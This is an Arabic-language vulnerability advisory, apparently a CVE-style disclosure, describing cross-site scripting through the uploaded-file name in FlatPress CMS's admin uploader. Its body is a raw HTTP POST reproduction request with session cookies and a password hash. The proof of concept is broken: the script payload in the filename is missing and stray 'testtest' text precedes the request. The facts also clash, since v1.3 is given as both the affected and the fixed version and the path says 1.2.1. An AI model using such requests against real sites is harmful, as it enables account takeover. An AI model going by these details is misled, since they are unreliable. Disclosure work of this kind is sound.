
ثغرة برمجة نصية عبر المواقع (XSS) في نظام إدارة المحتوى Flatpress CMS الإصدار v1.3 تسمح لمهاجم عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر حمولة مصممة خصيصًا في معلمة اسم الملف.
ثغرة برمجة نصية عبر المواقع (Cross Site Scripting) في نظام إدارة المحتوى FlatPress CMS الإصدار v1.3 تسمح لمهاجم عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر حمولة مصمّمة في معلمة اسم الملف.
المكوّن المتأثر: حقل رفع الملفات في لوحة تحكم FlatPress CMS
الإصدار الثابت: Flatpress v1.3 - سيتم إصلاحه في إصدار FlatPress 1.3.
نوع الهجوم: عن بُعد
نواقل الهجوم: استغلال الثغرة عن طريق صياغة اسم ملف الصورة
خطوات إعادة الإنتاج:
testtestPOST /flatpress-1.2.1/admin.php?p=uploader&action=default HTTP/1.1
Host: 127.0.0.1
Content-Length: 1598
Cache-Control: max-age=0
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHnyH0cX0ojRbqom
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/flatpress-1.2.1/admin.php?p=uploader
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-9b0a379a=parag; fppass_fp-9b0a379a=%242y%2410%24j.D1Ab.xVMoIDu9yQF8QjefOZmz9JPoh4QwzpoCdYxlqSkNQDGag2; fpsess_fp-9b0a379a=mg65h4rd8onvv2tniminpq635f
Connection: close
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wpnonce"
60f24876be
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wp_http_referer"
/flatpress-1.2.1/admin.php?p=uploader
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="upload[]"; filename="test.phpuh9aeairjipc8brr"
Content-Type: application/x-php
TEst
------WebKitFormBoundaryzHnyH0cX0ojRbqom--
المراجع:
https://portswigger.net/web-security/cross-site-scripting https://drive.google.com/file/d/1OthtP87MduNTYur_p0RZv3moY8CrBcaM/view
بائع المنتج: flatpress CMS
تم التأكيد في: 11/06/2023
المكتشف: Parag Bagul